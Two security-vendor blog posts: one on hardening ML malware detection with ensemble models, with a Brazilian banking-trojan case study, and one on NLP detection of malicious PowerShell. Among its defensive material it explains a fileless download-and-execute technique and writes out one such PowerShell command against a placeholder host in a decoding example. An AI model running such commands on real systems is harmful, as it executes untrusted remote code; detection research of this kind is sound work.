Figure 3. Client vs. cloud models

With models hosted in the cloud, it becomes more challenging to brute-force the model. Because the only way to understand what the models may be doing is to keep sending requests to the cloud protection system, such attempts to game the system are out in the open and can be detected and mitigated in the cloud.

Lesson: Use a diverse set of models

In addition to having multiple layers of ML-based protection, within each layer we run numerous individual ML models trained to recognize new and emerging threats. Each model has its own focus, or area of expertise. Some may focus on a specific file type (for example, PE files, VBA macros, JavaScript, etc.) while others may focus on attributes of a potential threat (for example, behavioral signals, fuzzy hash/distance to known malware, etc.). Different models use different ML algorithms and train on their own unique set of features.

Figure 4. Diversity of machine learning models

Each stand-alone model gives its own independent verdict about the likelihood that a potential threat is malware. The diversity, in addition to providing a robust and multi-faceted look at potential threats, offers stronger protection against attackers finding some underlying weakness in any single algorithm or feature set.

Lesson: Use stacked ensemble models

Another effective approach we’ve found to add resilience against adversarial attacks is to use ensemble models. While individual models provide a prediction scoped to a particular area of expertise, we can treat those individual predictions as features to additional ensemble machine learning models, combining the results from our diverse set of base classifiers to create even stronger predictions that are more resilient to attacks.

In particular, we’ve found that logistic stacking, where the individual probability scores from each base classifier are included in the ensemble feature set, provides increased effectiveness of malware prediction.

Figure 5. Ensemble machine learning model with individual model probabilities as feature inputs
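As a rough illustration of logistic stacking, the sketch below trains a logistic-regression meta-learner on the probability scores of three base classifiers. The scores are simulated with invented distributions; nothing here reflects Microsoft's actual models, features, or data:

```python
import numpy as np

rng = np.random.default_rng(0)

# Simulated probability scores from three diverse base classifiers for
# 200 files: first 100 clean, last 100 malicious (invented data).
n = 100
clean = rng.uniform(0.0, 0.5, size=(n, 3))
malicious = rng.uniform(0.4, 1.0, size=(n, 3))
X = np.vstack([clean, malicious])               # base scores become features
y = np.concatenate([np.zeros(n), np.ones(n)])   # 0 = clean, 1 = malware

def sigmoid(z):
    return 1.0 / (1.0 + np.exp(-z))

# Train a logistic-regression meta-learner on the stacked probabilities
# with plain gradient descent.
w, b = np.zeros(3), 0.0
for _ in range(2000):
    p = sigmoid(X @ w + b)
    w -= 0.5 * (X.T @ (p - y)) / len(y)
    b -= 0.5 * np.mean(p - y)

ensemble_score = sigmoid(X @ w + b)             # final malware probability
accuracy = np.mean((ensemble_score > 0.5) == y)
```

The meta-learner finds a weighting of the base scores that separates the classes better than any fixed threshold on a single score would.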

As discussed in detail in our Black Hat talk, experimental verification and real-world performance shows this approach helps us resist adversarial attacks. In June, the ensemble models represented nearly 12% of our total malware blocks from cloud protection, which translates into tens of thousands of computers protected by these new models every day.

Figure 6. Blocks by ensemble models vs. other cloud blocks

Case study: Ensemble models vs. regional banking Trojan

“The idea of ensemble learning is to build a prediction model by combining the strengths of a collection of simpler base models.”
— Trevor Hastie, Robert Tibshirani, Jerome Friedman

One of the key advantages of ensemble models is the ability to make high-fidelity predictions from a series of lower-fidelity inputs. This can sometimes seem a little spooky and counterintuitive to researchers, but use cases we’ve studied show this approach can catch malware that singular models cannot. That’s what happened in early June when a new banking trojan (detected by Windows Defender ATP as TrojanDownloader:VBS/Bancos) targeting users in Brazil was unleashed.

The attack

The attack started with spam email sent to users in Brazil, directing them to download an important document, inside of which was a highly obfuscated .vbs script.

Figure 7. Initial infection chain

Figure 8. Obfuscated malicious .vbs script

While the script contains several Base64-encoded Brazilian poems, its true purpose is to:

  • Check to make sure it’s running on a machine in Brazil
  • Check with its command-and-control server to see if the computer has already been infected
  • Download other malicious components, including a Google Chrome extension
  • Modify the shortcut to Google Chrome to run a different malicious .vbs file

Now whenever the user launches Chrome, this new .vbs malware instead runs.

Figure 9. Modified shortcut to Google Chrome

This new .vbs file runs a .bat file that:

  • Kills any running instances of Google Chrome
  • Copies the malicious Chrome extension into %UserProfile%\Chrome
  • Launches Google Chrome with the --load-extension= parameter pointing to the malicious extension

Figure 10. Malicious .bat file that loads the malicious Chrome extension

With the .bat file’s work done, the user’s Chrome instance is now running the malicious extension.

Figure 11. The installed Chrome extension

The extension itself runs malicious JavaScript (.js) files on every web page visited.

Figure 12. Inside the malicious Chrome extension

The .js files are highly obfuscated to avoid detection:

Figure 13. Obfuscated .js file

Decoding the hex at the start of the script, we can start to see some clues that this is a banking trojan:

Figure 14. Clues in script show its true intention

The .js files detect whether the website visited is a Brazilian banking site. If it is, the POST to the site is intercepted and sent to the attacker’s C&C to gather the user’s login credentials, credit card info, and other data before being passed on to the actual banking site. This activity happens behind the scenes; to the user, they’re just going about their normal routine with their bank.

Ensemble models and the malicious JavaScript

As the attack got under way, our cloud protection service received thousands of queries about the malicious .js files, triggered by a client-side ML model that considered these files suspicious. The files were highly polymorphic, with every potential victim receiving a unique, slightly altered version of the threat:

Figure 15. Polymorphic malware

The interesting part of the story is these malicious JavaScript files. How did our ML models perform in detecting these highly obfuscated scripts as malware? Let’s look at one of the instances. At the time of the query, we received metadata about the file. Here’s a snippet:

Report time 2018-06-14 01:16:03Z
SHA-256 1f47ec030da1b7943840661e32d0cb7a59d822e400063cd17dc5afa302ab6a52
Client file type model SUSPICIOUS
File name vNSAml.js
File size 28074
Extension .js
Is PE file FALSE
File age 0
File prevalence 0
Path C:\Users\<user>\Chrome\1.9.6\vNSAml.js
Process name xcopy.exe

Figure 16. File metadata sent during query to cloud protection service

Based on the process name, this query was sent when the .bat file copied the .js files into the %UserProfile%\Chrome directory.

Individual metadata-based classifiers evaluated the metadata and provided their probability scores. Ensemble models then used these probabilities, along with other features, to reach their own probability scores:

Model Probability that file is malware
Fuzzy hash 1 0.01
Fuzzy hash 2 0.06
ResearcherExpertise 0.64
Ensemble 1 0.85
Ensemble 2 0.91

Figure 17. Probability scores by individual classifiers

In this case, the second ensemble model had a strong enough score for the cloud to issue a blocking decision. Even though none of the individual classifiers in this case had a particularly strong score, the ensemble model had learned from training on millions of clean and malicious files that this combination of scores, in conjunction with a few other non-ML based features, indicated the file had a very strong likelihood of being malware.

Figure 18. Ensemble models issue a blocking decision

As the queries on the malicious .js files rolled in, the cloud issued blocking decisions within a few hundred milliseconds using the ensemble model’s strong probability score, enabling Windows Defender ATP’s antivirus capabilities to prevent the malicious .js from running and remove it. Here is a map overlay of the actual ensemble-based blocks of the malicious JavaScript files at the time:

Figure 19. Blocks by ensemble model of malicious JavaScript used in the attack

Ensemble ML models enabled Windows Defender ATP’s next-gen protection to defend thousands of customers in Brazil from having a potentially bad day at the hands of unscrupulous attackers, while ensuring the frustrated malware authors didn’t hit the big payday they were hoping for. Bom dia.


Further reading on machine learning and artificial intelligence in Windows Defender ATP

Indicators of compromise (IoCs)

  • (SHA-256: 93f488e4bb25977443ff34b593652bea06e7914564af5721727b1acdd453ced9)
  • Doc062018-2.vbs (SHA-256: 7b1b7b239f2d692d5f7f1bffa5626e8408f318b545cd2ae30f44483377a30f81)
  • zobXhz.js (SHA-256: 1f47ec030da1b7943840661e32d0cb7a59d822e400063cd17dc5afa302ab6a52)




Randy Treit, Holly Stewart, Jugal Parikh
Windows Defender Research
with special thanks to Allan Sepillo and Samuel Wakasugui



Talk to us

Questions, concerns, or insights on this story? Join discussions at the Microsoft community and Windows Defender Security Intelligence.

Follow us on Twitter @WDSecurity and Facebook Windows Defender Security Intelligence.

The post Protecting the protector: Hardening machine learning defenses against adversarial attacks appeared first on Microsoft Secure.

Malicious PowerShell Detection via Machine Learning


Cyber security vendors and researchers have reported for years how PowerShell is being used by cyber threat actors to install backdoors, execute malicious code, and otherwise achieve their objectives within enterprises. Security is a cat-and-mouse game between adversaries, researchers, and blue teams. The flexibility and capability of PowerShell has made conventional detection both challenging and critical. This blog post will illustrate how FireEye is leveraging artificial intelligence and machine learning to raise the bar for adversaries that use PowerShell.

In this post you will learn:

  • Why malicious PowerShell can be challenging to detect with a traditional “signature-based” or “rule-based” detection engine.
  • How Natural Language Processing (NLP) can be applied to tackle this challenge.
  • How our NLP model detects malicious PowerShell commands, even if obfuscated.
  • The economics of increasing the cost for the adversaries to bypass security solutions, while potentially reducing the release time of security content for detection engines.


PowerShell is one of the most popular tools used to carry out attacks. Data gathered from FireEye Dynamic Threat Intelligence (DTI) Cloud shows malicious PowerShell attacks rising throughout 2017 (Figure 1).

Figure 1: PowerShell attack statistics observed by FireEye DTI Cloud in 2017 – blue bars for the number of attacks detected, with the red curve for exponentially smoothed time series

FireEye has been tracking the malicious use of PowerShell for years. In 2014, Mandiant incident response investigators published a Black Hat paper that covers the tactics, techniques and procedures (TTPs) used in PowerShell attacks, as well as forensic artifacts on disk, in logs, and in memory produced from malicious use of PowerShell. In 2016, we published a blog post on how to improve PowerShell logging, which gives greater visibility into potential attacker activity. More recently, our in-depth report on APT32 highlighted this threat actor's use of PowerShell for reconnaissance and lateral movement procedures, as illustrated in Figure 2.

Figure 2: APT32 attack lifecycle, showing PowerShell attacks found in the kill chain

Let’s take a deep dive into an example of a malicious PowerShell command (Figure 3).

Figure 3: Example of a malicious PowerShell command

The following is a quick explanation of the arguments:

  • -NoProfile – indicates that the current user’s profile setup script should not be executed when the PowerShell engine starts.
  • -NonI – shorthand for -NonInteractive, meaning an interactive prompt to the user will not be presented.
  • -W Hidden – shorthand for “-WindowStyle Hidden”, which indicates that the PowerShell session window should be started in a hidden manner.
  • -Exec Bypass – shorthand for “-ExecutionPolicy Bypass”, which disables the execution policy for the current PowerShell session (default disallows execution). It should be noted that the Execution Policy isn’t meant to be a security boundary.
  • -encodedcommand – indicates the following chunk of text is a base64 encoded command.
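Because -EncodedCommand is simply Base64 over UTF-16LE text, such payloads can be decoded offline for inspection. A minimal sketch, using an invented (benign) command string rather than the actual sample:

```python
import base64

def decode_powershell_command(encoded):
    """PowerShell's -EncodedCommand argument is Base64 over a UTF-16LE string."""
    return base64.b64decode(encoded).decode("utf-16-le")

# Round-trip an invented command the way an analyst would decode a captured sample.
cmd = "IEX (New-Object Net.WebClient).DownloadString('http://example.test/a')"
encoded = base64.b64encode(cmd.encode("utf-16-le")).decode("ascii")
decoded = decode_powershell_command(encoded)
```

The UTF-16LE step is the detail analysts most often miss; decoding the bytes as plain ASCII yields interleaved null characters instead of readable script.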

What is hidden inside the Base64 decoded portion? Figure 4 shows the decoded command.

Figure 4: The decoded command for the aforementioned example

Interestingly, the decoded command unveils a stealthy fileless network access and remote content execution!

  • IEX is an alias for the Invoke-Expression cmdlet that will execute the command provided on the local machine.
  • The new-object cmdlet creates an instance of a .NET Framework or COM object, here a net.webclient object.
  • The downloadstring will download the contents from <url> into a memory buffer (which in turn IEX will execute).

It’s worth mentioning that a similar malicious PowerShell tactic was used in a recent cryptojacking attack exploiting CVE-2017-10271 to deliver a cryptocurrency miner. This attack involved the exploit being leveraged to deliver a PowerShell script, instead of downloading the executable directly. This PowerShell command is particularly stealthy because it leaves practically zero file artifacts on the host, making it hard for traditional antivirus to detect.

There are several reasons why adversaries prefer PowerShell:

  1. PowerShell has been widely adopted in Microsoft Windows as a powerful system administration scripting tool.
  2. Most attacker logic can be written in PowerShell without the need to install malicious binaries. This enables a minimal footprint on the endpoint.
  3. The flexible PowerShell syntax imposes combinatorial complexity challenges to signature-based detection rules.

Additionally, from an economics perspective:

  • Offensively, the cost for adversaries to modify PowerShell to bypass a signature-based rule is quite low, especially with open source obfuscation tools.
  • Defensively, updating handcrafted signature-based rules for new threats is time-consuming and limited to experts.

Next, we would like to share how we at FireEye are combining our PowerShell threat research with data science to combat this threat, thus raising the bar for adversaries.

Natural Language Processing for Detecting Malicious PowerShell

Can we use machine learning to predict if a PowerShell command is malicious?

One advantage FireEye has is our repository of high quality PowerShell examples that we harvest from our global deployments of FireEye solutions and services. Working closely with our in-house PowerShell experts, we curated a large training set that was comprised of malicious commands, as well as benign commands found in enterprise networks.

After we reviewed the PowerShell corpus, we quickly realized this fit nicely into the NLP problem space. We have built an NLP model that interprets PowerShell command text, similar to how Amazon Alexa interprets your voice commands.

One of the technical challenges we tackled was synonyms, a problem studied in linguistics. For instance, “NOL”, “NOLO”, and “NOLOGO” have identical semantics in PowerShell syntax. In NLP, a stemming algorithm reduces a word to its original form, such as “Innovating” being stemmed to “Innovate”.

We created a prefix-tree based stemmer for the PowerShell command syntax using an efficient data structure known as a trie, as shown in Figure 5. Even in a complex scripting language such as PowerShell, a trie can stem command tokens in nanoseconds.

Figure 5: Synonyms in the PowerShell syntax (left) and the trie stemmer capturing these equivalences (right)
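A trie-based stemmer of the kind described can be sketched as follows. This toy version stores a canonical form at each terminal node and loads only the NOLOGO equivalences from the example above; it is an illustration, not FireEye's implementation:

```python
class TrieStemmer:
    """Toy prefix-tree stemmer: walks the trie character by character and
    returns the canonical form stored at the node where the walk ends,
    falling back to the original token if none is stored there."""
    def __init__(self):
        self.root = {}

    def add(self, token, canonical):
        node = self.root
        for ch in token:
            node = node.setdefault(ch, {})
        node["$"] = canonical  # terminal marker holds the canonical form

    def stem(self, token):
        node = self.root
        for ch in token.upper():
            if ch not in node:
                break
            node = node[ch]
        return node.get("$", token)

stemmer = TrieStemmer()
for form in ("NOL", "NOLO", "NOLOGO"):
    stemmer.add(form, "NOLOGO")
```

Lookups are a single walk down the tree, one dictionary access per character, which is why tries stem tokens so quickly even for a large synonym table.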

The overall NLP pipeline we developed is captured in the following key modules:

NLP Key Modules

  • Decoder: Detect and decode any encoded text
  • Named Entity Recognition (NER): Detect and recognize any entities such as IP, URL, Email, Registry key, etc.
  • Tokenizer: Tokenize the PowerShell command into a list of tokens
  • Stemmer: Stem tokens into semantically identical tokens, using the trie
  • Vocabulary Vectorizer: Vectorize the list of tokens into a machine learning friendly format
  • Supervised classifier: Binary classification algorithms, including Kernel Support Vector Machine, Gradient Boosted Trees, and Deep Neural Networks
  • Reasoning: The explanation of why the prediction was made. Enables analysts to validate predictions.

The following are the key steps when streaming the aforementioned example through the NLP pipeline:

  • Detect and decode the Base64 commands, if any
  • Recognize entities using Named Entity Recognition (NER), such as the <URL>
  • Tokenize the entire text, including both clear text and obfuscated commands
  • Stem each token, and vectorize them based on the vocabulary
  • Predict the malicious probability using the supervised learning model

Figure 6: NLP pipeline that predicts the malicious probability of a PowerShell command
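The steps above can be strung together into a highly simplified pipeline sketch. The stemming table, entity pattern, and token-based "model" below are all invented stand-ins for FireEye's actual components, included only to show the shape of the flow:

```python
import base64
import binascii
import re

# Invented stand-ins: a tiny stem table and a tiny suspicious-token list.
STEMS = {"NOL": "NOLOGO", "NOLO": "NOLOGO", "NONI": "NONINTERACTIVE"}
SUSPICIOUS_TOKENS = {"IEX", "DOWNLOADSTRING", "ENCODEDCOMMAND",
                     "NOLOGO", "NONINTERACTIVE"}

def decode_base64_args(command):
    """Step 1: detect and decode Base64 chunks (UTF-16LE, as PowerShell uses)."""
    decoded = command
    for chunk in re.findall(r"[A-Za-z0-9+/=]{16,}", command):
        try:
            decoded += " " + base64.b64decode(chunk).decode("utf-16-le")
        except (binascii.Error, UnicodeDecodeError):
            pass  # not a decodable chunk; ignore
    return decoded

def pipeline_score(command):
    text = decode_base64_args(command)
    # Step 2: replace recognized entities (URLs here) with a placeholder token.
    text = re.sub(r"https?://\S+", "<URL>", text)
    # Steps 3-4: tokenize, then stem each token.
    tokens = [STEMS.get(t.upper(), t.upper()) for t in re.findall(r"[A-Za-z]+", text)]
    # Step 5: a stand-in "model": fraction of tokens that look suspicious.
    return sum(t in SUSPICIOUS_TOKENS for t in tokens) / max(len(tokens), 1)
```

In the real pipeline, step 5 is a trained supervised classifier over vectorized tokens rather than a hand-written ratio, but the data flow from decoding through scoring is the same.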

More importantly, we established a production end-to-end machine learning pipeline (Figure 7) so that we can constantly evolve with adversaries through re-labeling and re-training, and the release of the machine learning model into our products.

Figure 7: End-to-end machine learning production pipeline for PowerShell machine learning

Value Validated in the Field

We successfully implemented and optimized this machine learning model to a minimal footprint that fits into our research endpoint agent, which is able to make predictions in milliseconds on the host. Throughout 2018, we have deployed this PowerShell machine learning detection engine on incident response engagements. Early field validation has confirmed detections of malicious PowerShell attacks, including:

  • Commodity malware such as Kovter.
  • Red team penetration test activities.
  • New variants that bypassed legacy signatures but were detected by our machine learning model with high probabilistic confidence.

The unique values brought by the PowerShell machine learning detection engine include:  

  • The machine learning model automatically learns the malicious patterns from the curated corpus. In contrast to traditional detection signature rule engines, which are Boolean expression and regex based, the NLP model has lower operation cost and significantly cuts down the release time of security content.
  • The model performs probabilistic inference on unknown PowerShell commands by the implicitly learned non-linear combinations of certain patterns, which increases the cost for the adversaries to bypass.

The ultimate value of this innovation is to evolve with the broader threat landscape, and to create a competitive edge over adversaries.


We would like to acknowledge:

  • Daniel Bohannon, Christopher Glyer and Nick Carr for the support on threat research.
  • Alex Rivlin, HeeJong Lee, and Benjamin Chang from FireEye Labs for providing the DTI statistics.
  • Research endpoint support from Caleb Madrigal.
  • The FireEye ICE-DS Team.